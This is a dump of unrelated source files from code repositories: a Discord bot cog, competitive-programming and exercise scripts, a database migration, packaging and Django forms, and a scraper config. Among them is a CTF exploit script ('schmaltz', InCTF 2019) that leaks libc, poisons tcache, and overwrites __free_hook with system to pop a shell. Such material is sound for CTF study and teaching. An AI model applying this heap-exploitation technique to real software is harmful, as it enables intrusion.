@commands.is_owner()
async def unload(self, ctx, extensions):
self.bot.unload_extension(f"cogs.{extensions}")
await ctx.send("Unloaded Cogs")
# Reload Command
@commands.command(name="reload", description="Reload the cogs.", usage="<cog_name or extension_name>")
@commands.is_owner()
async def reload(self, ctx, extensions):
self.bot.reload_extension(f"cogs.{extensions}")
await ctx.send("Reloaded Cogs")
| 34.363636 | 107 | 0.663139 | import nextcord
from nextcord.ext import commands
class CogSetup(commands.Cog, name="Extension Setup", description="Load, Unload or Reload the extensions."):
def __init__(self, bot):
self.bot = bot
COG_EMOJI = "⚙️"
@commands.command(name="load", description="Load the cogs.", usage="<cog_name or extension_name>")
@commands.is_owner()
async def load(self, ctx, extensions):
self.bot.load_extension(f"cogs.{extensions}")
await ctx.send("Loaded Cogs")
@commands.command(name="unload", description="Unload the cogs.", usage="<cog_name or extension_name>")
@commands.is_owner()
async def unload(self, ctx, extensions):
self.bot.unload_extension(f"cogs.{extensions}")
await ctx.send("Unloaded Cogs")
@commands.command(name="reload", description="Reload the cogs.", usage="<cog_name or extension_name>")
@commands.is_owner()
async def reload(self, ctx, extensions):
self.bot.reload_extension(f"cogs.{extensions}")
await ctx.send("Reloaded Cogs")
| true | true |
1c331618c8fa5a71c5b4d40f6f354c23efb05154 | 601 | py | Python | AtCoder/ABC045/D.py | takaaki82/Java-Lessons | c4f11462bf84c091527dde5f25068498bfb2cc49 | [
"MIT"
] | 1 | 2018-11-25T04:15:45.000Z | 2018-11-25T04:15:45.000Z | AtCoder/ABC045/D.py | takaaki82/Java-Lessons | c4f11462bf84c091527dde5f25068498bfb2cc49 | [
"MIT"
] | null | null | null | AtCoder/ABC045/D.py | takaaki82/Java-Lessons | c4f11462bf84c091527dde5f25068498bfb2cc49 | [
"MIT"
] | 2 | 2018-08-08T13:01:14.000Z | 2018-11-25T12:38:36.000Z | H, W, N = map(int, input().split())
ab = []
for i in range(N):
a, b = map(int, input().split())
ab.append((a - 1, b - 1))
comb_map = {}
for a, b in ab:
for k in range(3):
for m in range(3):
if 0 <= a - k < H - 2 and 0 <= b - m < W - 2:
if (a - k, b - m) in comb_map.keys():
comb_map[(a - k, b - m)] += 1
else:
comb_map[(a - k, b - m)] = 1
count = [0 for _ in range(10)]
for v in comb_map.values():
count[v] += 1
count[0] = (H - 2) * (W - 2) - sum(count[1:])
for c in count:
print(c)
| 22.259259 | 57 | 0.417637 | H, W, N = map(int, input().split())
ab = []
for i in range(N):
a, b = map(int, input().split())
ab.append((a - 1, b - 1))
comb_map = {}
for a, b in ab:
for k in range(3):
for m in range(3):
if 0 <= a - k < H - 2 and 0 <= b - m < W - 2:
if (a - k, b - m) in comb_map.keys():
comb_map[(a - k, b - m)] += 1
else:
comb_map[(a - k, b - m)] = 1
count = [0 for _ in range(10)]
for v in comb_map.values():
count[v] += 1
count[0] = (H - 2) * (W - 2) - sum(count[1:])
for c in count:
print(c)
| true | true |
1c331652aac3fe02dca4d80a87a46912b21c30c3 | 5,214 | py | Python | installation/migrations/dbschema.files-and-directories.py | fekblom/critic | a6b60c9053e13d4c878d50531860d7389568626d | [
"Apache-2.0"
] | 216 | 2015-01-05T12:48:10.000Z | 2022-03-08T00:12:23.000Z | installation/migrations/dbschema.files-and-directories.py | fekblom/critic | a6b60c9053e13d4c878d50531860d7389568626d | [
"Apache-2.0"
] | 55 | 2015-02-28T12:10:26.000Z | 2020-11-18T17:45:16.000Z | installation/migrations/dbschema.files-and-directories.py | fekblom/critic | a6b60c9053e13d4c878d50531860d7389568626d | [
"Apache-2.0"
] | 34 | 2015-05-02T15:15:10.000Z | 2020-06-15T19:20:37.000Z | # -*- mode: python; encoding: utf-8 -*-
#
# Copyright 2013 Jens Lindström, Opera Software ASA
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
import sys
import psycopg2
import json
import argparse
import os
parser = argparse.ArgumentParser()
parser.add_argument("--uid", type=int)
parser.add_argument("--gid", type=int)
arguments = parser.parse_args()
os.setgid(arguments.gid)
os.setuid(arguments.uid)
data = json.load(sys.stdin)
import configuration
db = psycopg2.connect(**configuration.database.PARAMETERS)
cursor = db.cursor()
def column_exists(table, column):
try:
cursor.execute("SELECT %s FROM %s LIMIT 1" % (column, table))
return True
except psycopg2.ProgrammingError:
db.rollback()
return False
added = [column_exists("files", "path"),
column_exists("filters", "path"),
column_exists("reviewfilters", "path")]
removed = [column_exists("files", "directory"),
column_exists("files", "name"),
column_exists("filters", "directory"),
column_exists("filters", "file"),
column_exists("reviewfilters", "directory"),
column_exists("reviewfilters", "file"),
column_exists("directories", "id")]
if all(added) and not any(removed):
# All expected modifications appear to have taken place already.
sys.exit(0)
elif any(added) or not all(removed):
# Some modifications appear to have taken place already, but not
# all. This is bad, and possibly unrecoverable. It's probably
# not a good idea to just run the commands below.
sys.stderr.write("""\
The database schema appears to be in an inconsistent state!
Please see installation/migrations/dbschema.files-and-directories.py
and try to figure out which of the commands in it to run.
Alternatively, restore a database backup from before the previous
upgrade attempt, and then try running upgrade.py again.
""")
sys.exit(1)
# Add 'path' column to 'files' table.
cursor.execute("ALTER TABLE files ADD path TEXT")
cursor.execute("UPDATE files SET path=fullfilename(id)")
cursor.execute("ALTER TABLE files ALTER path SET NOT NULL")
cursor.execute("CREATE UNIQUE INDEX files_path_md5 ON files (MD5(path))")
cursor.execute("CREATE INDEX files_path_gin ON files USING gin (STRING_TO_ARRAY(path, '/'))")
# Modify 'filters' table similarly.
cursor.execute("ALTER TABLE filters ADD path TEXT")
cursor.execute("UPDATE filters SET path=fullfilename(file) WHERE file>0")
cursor.execute("UPDATE filters SET path=COALESCE(NULLIF(fulldirectoryname(directory), ''), '/') WHERE file=0")
cursor.execute("ALTER TABLE filters ALTER path SET NOT NULL")
cursor.execute("CREATE UNIQUE INDEX filters_repository_uid_path_md5 ON filters (repository, uid, MD5(path))")
# Modify 'reviewfilters' table similarly.
cursor.execute("ALTER TABLE reviewfilters ADD path TEXT")
cursor.execute("UPDATE reviewfilters SET path=fullfilename(file) WHERE file>0")
cursor.execute("UPDATE reviewfilters SET path=COALESCE(NULLIF(fulldirectoryname(directory), ''), '/') WHERE file=0")
cursor.execute("ALTER TABLE reviewfilters ALTER path SET NOT NULL")
cursor.execute("CREATE UNIQUE INDEX reviewfilters_review_uid_path_md5 ON reviewfilters (review, uid, MD5(path))")
# Modify 'reviewfilterchanges' table similarly.
cursor.execute("ALTER TABLE reviewfilterchanges ADD path TEXT")
cursor.execute("UPDATE reviewfilterchanges SET path=fullfilename(file) WHERE file>0")
cursor.execute("UPDATE reviewfilterchanges SET path=fulldirectoryname(directory) WHERE file=0")
cursor.execute("ALTER TABLE reviewfilterchanges ALTER path SET NOT NULL")
# Drop the now redundant 'directories' table.
cursor.execute("ALTER TABLE files DROP directory, DROP name")
cursor.execute("ALTER TABLE filters DROP directory, DROP file, DROP specificity")
cursor.execute("ALTER TABLE reviewfilters DROP directory, DROP file")
cursor.execute("ALTER TABLE reviewfilterchanges DROP directory, DROP file")
cursor.execute("DROP TABLE directories")
# Drop various utility functions that are no longer necessary.
cursor.execute("DROP FUNCTION IF EXISTS filepath()")
cursor.execute("DROP FUNCTION IF EXISTS directorypath()")
cursor.execute("DROP FUNCTION IF EXISTS subdirectories()")
cursor.execute("DROP FUNCTION IF EXISTS containedfiles()")
cursor.execute("DROP FUNCTION IF EXISTS fullfilename()")
cursor.execute("DROP FUNCTION IF EXISTS fulldirectoryname()")
cursor.execute("DROP FUNCTION IF EXISTS findfile()")
cursor.execute("DROP FUNCTION IF EXISTS finddirectory()")
db.commit()
# ALTER TYPE ... ADD VALUE cannot be executed inside a transaction block.
db.autocommit = True
# Add filter type "ignored".
cursor.execute("ALTER TYPE filtertype ADD VALUE 'ignored'")
db.close()
| 40.418605 | 116 | 0.75163 |
import sys
import psycopg2
import json
import argparse
import os
parser = argparse.ArgumentParser()
parser.add_argument("--uid", type=int)
parser.add_argument("--gid", type=int)
arguments = parser.parse_args()
os.setgid(arguments.gid)
os.setuid(arguments.uid)
data = json.load(sys.stdin)
import configuration
db = psycopg2.connect(**configuration.database.PARAMETERS)
cursor = db.cursor()
def column_exists(table, column):
try:
cursor.execute("SELECT %s FROM %s LIMIT 1" % (column, table))
return True
except psycopg2.ProgrammingError:
db.rollback()
return False
added = [column_exists("files", "path"),
column_exists("filters", "path"),
column_exists("reviewfilters", "path")]
removed = [column_exists("files", "directory"),
column_exists("files", "name"),
column_exists("filters", "directory"),
column_exists("filters", "file"),
column_exists("reviewfilters", "directory"),
column_exists("reviewfilters", "file"),
column_exists("directories", "id")]
if all(added) and not any(removed):
sys.exit(0)
elif any(added) or not all(removed):
# not a good idea to just run the commands below.
sys.stderr.write("""\
The database schema appears to be in an inconsistent state!
Please see installation/migrations/dbschema.files-and-directories.py
and try to figure out which of the commands in it to run.
Alternatively, restore a database backup from before the previous
upgrade attempt, and then try running upgrade.py again.
""")
sys.exit(1)
# Add 'path' column to 'files' table.
cursor.execute("ALTER TABLE files ADD path TEXT")
cursor.execute("UPDATE files SET path=fullfilename(id)")
cursor.execute("ALTER TABLE files ALTER path SET NOT NULL")
cursor.execute("CREATE UNIQUE INDEX files_path_md5 ON files (MD5(path))")
cursor.execute("CREATE INDEX files_path_gin ON files USING gin (STRING_TO_ARRAY(path, '/'))")
# Modify 'filters' table similarly.
cursor.execute("ALTER TABLE filters ADD path TEXT")
cursor.execute("UPDATE filters SET path=fullfilename(file) WHERE file>0")
cursor.execute("UPDATE filters SET path=COALESCE(NULLIF(fulldirectoryname(directory), ''), '/') WHERE file=0")
cursor.execute("ALTER TABLE filters ALTER path SET NOT NULL")
cursor.execute("CREATE UNIQUE INDEX filters_repository_uid_path_md5 ON filters (repository, uid, MD5(path))")
# Modify 'reviewfilters' table similarly.
cursor.execute("ALTER TABLE reviewfilters ADD path TEXT")
cursor.execute("UPDATE reviewfilters SET path=fullfilename(file) WHERE file>0")
cursor.execute("UPDATE reviewfilters SET path=COALESCE(NULLIF(fulldirectoryname(directory), ''), '/') WHERE file=0")
cursor.execute("ALTER TABLE reviewfilters ALTER path SET NOT NULL")
cursor.execute("CREATE UNIQUE INDEX reviewfilters_review_uid_path_md5 ON reviewfilters (review, uid, MD5(path))")
# Modify 'reviewfilterchanges' table similarly.
cursor.execute("ALTER TABLE reviewfilterchanges ADD path TEXT")
cursor.execute("UPDATE reviewfilterchanges SET path=fullfilename(file) WHERE file>0")
cursor.execute("UPDATE reviewfilterchanges SET path=fulldirectoryname(directory) WHERE file=0")
cursor.execute("ALTER TABLE reviewfilterchanges ALTER path SET NOT NULL")
# Drop the now redundant 'directories' table.
cursor.execute("ALTER TABLE files DROP directory, DROP name")
cursor.execute("ALTER TABLE filters DROP directory, DROP file, DROP specificity")
cursor.execute("ALTER TABLE reviewfilters DROP directory, DROP file")
cursor.execute("ALTER TABLE reviewfilterchanges DROP directory, DROP file")
cursor.execute("DROP TABLE directories")
# Drop various utility functions that are no longer necessary.
cursor.execute("DROP FUNCTION IF EXISTS filepath()")
cursor.execute("DROP FUNCTION IF EXISTS directorypath()")
cursor.execute("DROP FUNCTION IF EXISTS subdirectories()")
cursor.execute("DROP FUNCTION IF EXISTS containedfiles()")
cursor.execute("DROP FUNCTION IF EXISTS fullfilename()")
cursor.execute("DROP FUNCTION IF EXISTS fulldirectoryname()")
cursor.execute("DROP FUNCTION IF EXISTS findfile()")
cursor.execute("DROP FUNCTION IF EXISTS finddirectory()")
db.commit()
# ALTER TYPE ... ADD VALUE cannot be executed inside a transaction block.
db.autocommit = True
# Add filter type "ignored".
cursor.execute("ALTER TYPE filtertype ADD VALUE 'ignored'")
db.close()
| true | true |
1c3316737fce0dbb30450130ad8d0edd48534733 | 1,194 | py | Python | setup.py | bentetamas/tinycards-python-api | 98c35c8b1fbad28fcc61c01cbdae7e092e779a62 | [
"MIT"
] | null | null | null | setup.py | bentetamas/tinycards-python-api | 98c35c8b1fbad28fcc61c01cbdae7e092e779a62 | [
"MIT"
] | null | null | null | setup.py | bentetamas/tinycards-python-api | 98c35c8b1fbad28fcc61c01cbdae7e092e779a62 | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
NAME = 'tinycards'
setup(
name=NAME,
version='0.281',
description="An unofficial Python API for Tinycards by Duolingo",
url='https://github.com/floscha/tinycards-python-api',
author='Florian Schäfer',
author_email='florian.joh.schaefer@gmail.com',
license='MIT',
packages=find_packages(),
install_requires=[
'requests==2.21.0',
'requests-toolbelt==0.9.1',
'retrying==1.3.3',
'typer==0.0.8'
],
zip_safe=False,
entry_points={
'console_scripts': [
'tinycards = tinycards.client.cli:app',
]
},
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3 :: Only',
'Topic :: Software Development'
]
)
| 29.85 | 69 | 0.586265 | from setuptools import setup, find_packages
NAME = 'tinycards'
setup(
name=NAME,
version='0.281',
description="An unofficial Python API for Tinycards by Duolingo",
url='https://github.com/floscha/tinycards-python-api',
author='Florian Schäfer',
author_email='florian.joh.schaefer@gmail.com',
license='MIT',
packages=find_packages(),
install_requires=[
'requests==2.21.0',
'requests-toolbelt==0.9.1',
'retrying==1.3.3',
'typer==0.0.8'
],
zip_safe=False,
entry_points={
'console_scripts': [
'tinycards = tinycards.client.cli:app',
]
},
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3 :: Only',
'Topic :: Software Development'
]
)
| true | true |
1c3318416dc8b7805443ceeac11a29cef738ae32 | 1,225 | py | Python | NesaraTours/migrations/0002_auto_20200831_0946.py | Annonymus-Coder/Tours-And-Travels-project | 81fce5c24599895b6526eeb28bd4582b5d55948b | [
"MIT"
] | null | null | null | NesaraTours/migrations/0002_auto_20200831_0946.py | Annonymus-Coder/Tours-And-Travels-project | 81fce5c24599895b6526eeb28bd4582b5d55948b | [
"MIT"
] | null | null | null | NesaraTours/migrations/0002_auto_20200831_0946.py | Annonymus-Coder/Tours-And-Travels-project | 81fce5c24599895b6526eeb28bd4582b5d55948b | [
"MIT"
] | null | null | null | # Generated by Django 3.1 on 2020-08-31 04:16
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('auth', '0012_alter_user_first_name_max_length'),
('NesaraTours', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='employee',
name='role',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='auth.group'),
),
migrations.AddField(
model_name='employee',
name='user',
field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='tour',
name='Employee',
field=models.ManyToManyField(to='NesaraTours.Employee'),
),
migrations.AlterField(
model_name='tour',
name='Client',
field=models.ManyToManyField(to='NesaraTours.Client'),
),
]
| 32.236842 | 125 | 0.601633 |
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('auth', '0012_alter_user_first_name_max_length'),
('NesaraTours', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='employee',
name='role',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='auth.group'),
),
migrations.AddField(
model_name='employee',
name='user',
field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='tour',
name='Employee',
field=models.ManyToManyField(to='NesaraTours.Employee'),
),
migrations.AlterField(
model_name='tour',
name='Client',
field=models.ManyToManyField(to='NesaraTours.Client'),
),
]
| true | true |
1c3318ca5161384c5534f50a78303c641566d024 | 324 | py | Python | redcmd/client/__main__.py | amol9/redcmd | 34086eb42ec6acc16dbd2b3ea530898a6a287639 | [
"MIT"
] | 1 | 2015-10-26T19:38:28.000Z | 2015-10-26T19:38:28.000Z | redcmd/client/__main__.py | amol9/redcmd | 34086eb42ec6acc16dbd2b3ea530898a6a287639 | [
"MIT"
] | null | null | null | redcmd/client/__main__.py | amol9/redcmd | 34086eb42ec6acc16dbd2b3ea530898a6a287639 | [
"MIT"
] | null | null | null |
from .. import CommandLine, CommandLineError, Subcommand, subcmd
from ..version import __version__
from .autocomp_subcommand import *
from .init_subcommand import *
cmdline = CommandLine(prog='redcmd', description='redcmd client.',
version=__version__)
try:
cmdline.execute()
except CommandLineError as e:
print(e)
| 20.25 | 66 | 0.777778 |
from .. import CommandLine, CommandLineError, Subcommand, subcmd
from ..version import __version__
from .autocomp_subcommand import *
from .init_subcommand import *
cmdline = CommandLine(prog='redcmd', description='redcmd client.',
version=__version__)
try:
cmdline.execute()
except CommandLineError as e:
print(e)
| true | true |
1c33198acec018137f92a47269f0ef6f6b75370d | 1,323 | py | Python | accounts/forms.py | Paul-Cheeseman/Stream3-Project | 174fa1d6bbf9ed75748513af366629ed01dddfee | [
"BSD-3-Clause"
] | null | null | null | accounts/forms.py | Paul-Cheeseman/Stream3-Project | 174fa1d6bbf9ed75748513af366629ed01dddfee | [
"BSD-3-Clause"
] | 8 | 2020-02-12T00:52:56.000Z | 2022-03-11T23:23:20.000Z | accounts/forms.py | Paul-Cheeseman/Stream3-Project | 174fa1d6bbf9ed75748513af366629ed01dddfee | [
"BSD-3-Clause"
] | 1 | 2018-02-22T11:15:48.000Z | 2018-02-22T11:15:48.000Z | from django import forms
from django.contrib.auth.forms import UserCreationForm
from accounts.models import User
#User Registration form - based on code from Code Institute
class UserRegistrationForm(UserCreationForm):
password1 = forms.CharField(
label='Password',
widget=forms.PasswordInput
)
password2 = forms.CharField(
label='Password Confirmation',
widget=forms.PasswordInput
)
class Meta:
model = User
fields = ['email', 'password1', 'password2']
exclude = ['username']
def clean_password2(self):
password1 = self.cleaned_data.get('password1')
password2 = self.cleaned_data.get('password2')
if password1 and password2 and password1 != password2:
message = "Passwords do not match"
raise forms.ValidationError(message)
return password2
def save(self, commit=True):
instance = super(UserRegistrationForm, self).save(commit=False)
# automatically set to email address to create a unique identifier
instance.username = instance.email
if commit:
instance.save()
return instance
class UserLoginForm(forms.Form):
email = forms.EmailField()
password = forms.CharField(widget=forms.PasswordInput)
| 25.941176 | 74 | 0.662887 | from django import forms
from django.contrib.auth.forms import UserCreationForm
from accounts.models import User
class UserRegistrationForm(UserCreationForm):
password1 = forms.CharField(
label='Password',
widget=forms.PasswordInput
)
password2 = forms.CharField(
label='Password Confirmation',
widget=forms.PasswordInput
)
class Meta:
model = User
fields = ['email', 'password1', 'password2']
exclude = ['username']
def clean_password2(self):
password1 = self.cleaned_data.get('password1')
password2 = self.cleaned_data.get('password2')
if password1 and password2 and password1 != password2:
message = "Passwords do not match"
raise forms.ValidationError(message)
return password2
def save(self, commit=True):
instance = super(UserRegistrationForm, self).save(commit=False)
instance.username = instance.email
if commit:
instance.save()
return instance
class UserLoginForm(forms.Form):
email = forms.EmailField()
password = forms.CharField(widget=forms.PasswordInput)
| true | true |
1c3319ce9f23f6f47aafb85e691db243fef0398c | 1,738 | py | Python | Gathered CTF writeups/ptr-yudai-writeups/2019/InCTF_2019/schmaltz/solve.py | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | 1 | 2022-03-27T06:00:41.000Z | 2022-03-27T06:00:41.000Z | Gathered CTF writeups/ptr-yudai-writeups/2019/InCTF_2019/schmaltz/solve.py | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | null | null | null | Gathered CTF writeups/ptr-yudai-writeups/2019/InCTF_2019/schmaltz/solve.py | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | 1 | 2022-03-27T06:01:42.000Z | 2022-03-27T06:01:42.000Z | from ptrlib import *
def add(size, data):
sock.sendlineafter("> ", "1")
sock.sendlineafter("> ", str(size))
if size > 0:
sock.sendafter("> ", data)
return
def view(index):
sock.sendlineafter("> ", "3")
sock.sendlineafter("> ", str(index))
sock.recvuntil("Content: ")
return sock.recvline()
def delete(index):
sock.sendlineafter("> ", "4")
sock.sendlineafter("> ", str(index))
return
def offset(address):
assert address % 0x10 == 0
return (address - 0x602060) // 0x10
libc = ELF("./libc.so.6")
elf = ELF("./schmaltz")
sock = Process(["./schmaltz"], env={"LD_LIBRARY_PATH": "./"})
#sock = Socket("52.23.219.15", 1337)
libc_main_arena = 0x3b0c40
magic01 = 0x105ae0
one_gadget = 0x41aca
# leak heap address
add(0x28, "A") # 0
add(0x28, "B") # 1
delete(1)
delete(0)
add(0x28, "\x60") # 0
addr_heap = u64(view(0))
logger.info("addr_heap = " + hex(addr_heap))
delete(0)
# leak libc address
add(0x38, "0") # 0
add(0x108, "A") # 1
delete(0)
delete(1)
add(0x38, b'0' * 0x38) # 0
delete(1)
add(0xf8, p64(addr_heap + 0xc0) + p64(0)*2 + p64(0x431)) # 0
add(0x108, "A") # 1
add(0x108, "target") # 2
add(0x1e0, "X" * 0x1df) # 3
add(0x1e0, (p64(0) + p64(0x21)) * 0x1d) # 4
delete(3)
delete(4)
add(0x48, "1" * 0x40) # 3: prepare for next
add(0x200, "B") # 4
delete(4)
delete(3)
delete(2) # link to unsorted bin
delete(0)
add(0x38, "\x90") # 0
libc_base = u64(view(1)) - libc_main_arena - 1104
logger.info("libc = " + hex(libc_base))
# tcache poisoning
add(0x48, "X" * 0x40) # 2
add(0x28, "count up")
delete(4)
add(0x1f8, p64(libc_base + libc.symbol("__free_hook")))
add(0x200, "/bin/sh")
add(0x200, p64(libc_base + libc.symbol("system")))
# get the shell!
delete(3)
sock.interactive()
| 22 | 61 | 0.623705 | from ptrlib import *
def add(size, data):
sock.sendlineafter("> ", "1")
sock.sendlineafter("> ", str(size))
if size > 0:
sock.sendafter("> ", data)
return
def view(index):
sock.sendlineafter("> ", "3")
sock.sendlineafter("> ", str(index))
sock.recvuntil("Content: ")
return sock.recvline()
def delete(index):
sock.sendlineafter("> ", "4")
sock.sendlineafter("> ", str(index))
return
def offset(address):
assert address % 0x10 == 0
return (address - 0x602060) // 0x10
libc = ELF("./libc.so.6")
elf = ELF("./schmaltz")
sock = Process(["./schmaltz"], env={"LD_LIBRARY_PATH": "./"})
libc_main_arena = 0x3b0c40
magic01 = 0x105ae0
one_gadget = 0x41aca
add(0x28, "A")
add(0x28, "B")
delete(1)
delete(0)
add(0x28, "\x60")
addr_heap = u64(view(0))
logger.info("addr_heap = " + hex(addr_heap))
delete(0)
add(0x38, "0")
add(0x108, "A")
delete(0)
delete(1)
add(0x38, b'0' * 0x38)
delete(1)
add(0xf8, p64(addr_heap + 0xc0) + p64(0)*2 + p64(0x431))
add(0x108, "A")
add(0x108, "target")
add(0x1e0, "X" * 0x1df)
add(0x1e0, (p64(0) + p64(0x21)) * 0x1d)
delete(3)
delete(4)
add(0x48, "1" * 0x40)
add(0x200, "B")
delete(4)
delete(3)
delete(2)
delete(0)
add(0x38, "\x90")
libc_base = u64(view(1)) - libc_main_arena - 1104
logger.info("libc = " + hex(libc_base))
add(0x48, "X" * 0x40)
add(0x28, "count up")
delete(4)
add(0x1f8, p64(libc_base + libc.symbol("__free_hook")))
add(0x200, "/bin/sh")
add(0x200, p64(libc_base + libc.symbol("system")))
delete(3)
sock.interactive()
| true | true |
1c3319d1b95ffbb366d5639dab284adc07453f08 | 641 | py | Python | src/test.py | erikmetzinfo/tds_db_generator | 1082a670f1ecd46c2dc7f0ebe8baccdcaf70a867 | [
"MIT"
] | null | null | null | src/test.py | erikmetzinfo/tds_db_generator | 1082a670f1ecd46c2dc7f0ebe8baccdcaf70a867 | [
"MIT"
] | null | null | null | src/test.py | erikmetzinfo/tds_db_generator | 1082a670f1ecd46c2dc7f0ebe8baccdcaf70a867 | [
"MIT"
] | null | null | null |
from general_pkg import string_comparison
from fuzzywuzzy import process as fuzzy_process
a = 'Ratio by weight ( A / B ) 100/ 9505'
a = 'Ratio by weight ( A / B ) 100/ 9505'
b = 'Ratio by weight ( A / B )'
match, match_ratio = string_comparison(a,b,max_value=95)
def special_string_comparison(string1, string2):
reverse_string2 = string2[::-1]
string1_ = string1
last_pos=0
for c in reverse_string2:
pos = string1_.rfind(c)
if pos > last_pos:
last_pos = pos
string1_ = string1_[:pos]
val = string1[last_pos + 1:].strip()
return val
val = special_string_comparison(a,b)
x=1 | 26.708333 | 56 | 0.659906 |
from general_pkg import string_comparison
from fuzzywuzzy import process as fuzzy_process
a = 'Ratio by weight ( A / B ) 100/ 9505'
a = 'Ratio by weight ( A / B ) 100/ 9505'
b = 'Ratio by weight ( A / B )'
match, match_ratio = string_comparison(a,b,max_value=95)
def special_string_comparison(string1, string2):
reverse_string2 = string2[::-1]
string1_ = string1
last_pos=0
for c in reverse_string2:
pos = string1_.rfind(c)
if pos > last_pos:
last_pos = pos
string1_ = string1_[:pos]
val = string1[last_pos + 1:].strip()
return val
val = special_string_comparison(a,b)
x=1 | true | true |
1c331a30f7049c48688de08a8d07b2dec8e1d49a | 981 | py | Python | scraper/storage_spiders/thanhhuongshoescom.py | chongiadung/choinho | d2a216fe7a5064d73cdee3e928a7beef7f511fd1 | [
"MIT"
] | null | null | null | scraper/storage_spiders/thanhhuongshoescom.py | chongiadung/choinho | d2a216fe7a5064d73cdee3e928a7beef7f511fd1 | [
"MIT"
] | 10 | 2020-02-11T23:34:28.000Z | 2022-03-11T23:16:12.000Z | scraper/storage_spiders/thanhhuongshoescom.py | chongiadung/choinho | d2a216fe7a5064d73cdee3e928a7beef7f511fd1 | [
"MIT"
] | 3 | 2018-08-05T14:54:25.000Z | 2021-06-07T01:49:59.000Z | # Auto generated by generator.py. Delete this line if you make modification.
from scrapy.spiders import Rule
from scrapy.linkextractors import LinkExtractor
XPATH = {
'name' : "//h1",
'price' : "//em[@class='ProductPrice VariationProductPrice']",
'category' : "//div[@id='Breadcrumb']/ul/li/a",
'description' : "//div[@id='ProductDescription']/div[@class='ProductDescriptionContainer']/p",
'images' : "(//div[@class='ProductThumbImage']/a/@href)[1]",
'canonical' : "//link[@rel='canonical']",
'base_url' : "",
'brand' : ""
}
name = 'thanhhuongshoes.com'
allowed_domains = ['thanhhuongshoes.com']
start_urls = ['http://thanhhuongshoes.com/san-pham-p7.html']
tracking_url = ''
sitemap_urls = ['']
sitemap_rules = [('', 'parse_item')]
sitemap_follow = []
rules = [
Rule(LinkExtractor(allow=['/[a-zA-Z0-9-]+-\d+\.html']), 'parse_item'),
Rule(LinkExtractor(allow=['-b\d+\.html']), 'parse'),
#Rule(LinkExtractor(), 'parse_item_and_links'),
]
| 36.333333 | 98 | 0.651376 |
from scrapy.spiders import Rule
from scrapy.linkextractors import LinkExtractor
XPATH = {
'name' : "//h1",
'price' : "//em[@class='ProductPrice VariationProductPrice']",
'category' : "//div[@id='Breadcrumb']/ul/li/a",
'description' : "//div[@id='ProductDescription']/div[@class='ProductDescriptionContainer']/p",
'images' : "(//div[@class='ProductThumbImage']/a/@href)[1]",
'canonical' : "//link[@rel='canonical']",
'base_url' : "",
'brand' : ""
}
name = 'thanhhuongshoes.com'
allowed_domains = ['thanhhuongshoes.com']
start_urls = ['http://thanhhuongshoes.com/san-pham-p7.html']
tracking_url = ''
sitemap_urls = ['']
sitemap_rules = [('', 'parse_item')]
sitemap_follow = []
rules = [
Rule(LinkExtractor(allow=['/[a-zA-Z0-9-]+-\d+\.html']), 'parse_item'),
Rule(LinkExtractor(allow=['-b\d+\.html']), 'parse'),
]
| true | true |
1c331a47640bd205d642269fb7ca24e833c01fa8 | 419 | py | Python | ex011.py | erikamaylim/Python-CursoemVideo | 5a6809818c4c55a02ec52379d95f3d20c833df2e | [
"MIT"
] | null | null | null | ex011.py | erikamaylim/Python-CursoemVideo | 5a6809818c4c55a02ec52379d95f3d20c833df2e | [
"MIT"
] | null | null | null | ex011.py | erikamaylim/Python-CursoemVideo | 5a6809818c4c55a02ec52379d95f3d20c833df2e | [
"MIT"
] | null | null | null | """Faça um programa que leia a largura e a altura de uma parede em metros,
calcule a sua área e a quantidade de tinta necessária para pintá-la,
sabendo que cada litro de tinta pinta uma área de 2 metros quadrados."""
l = float(input('Digite a largura em metros: '))
h = float(input('Digite a altura em metros: '))
a = l * h
t = a / 2
print('A área tem {:.2f}m² e são necessários {:.2f} litros de tinta.'.format(a, t))
| 41.9 | 83 | 0.699284 |
l = float(input('Digite a largura em metros: '))
h = float(input('Digite a altura em metros: '))
a = l * h
t = a / 2
print('A área tem {:.2f}m² e são necessários {:.2f} litros de tinta.'.format(a, t))
| true | true |
1c331a4818a19d2eb248b16229fc321ce8b19a30 | 10,343 | py | Python | myven/lib/python3.8/site-packages/ansible/modules/cloud/azure/azure_rm_mysqldatabase.py | baltham/dne-dna-code | 4a13309a790a670d2f07e635c9264a0c29976c6a | [
"MIT"
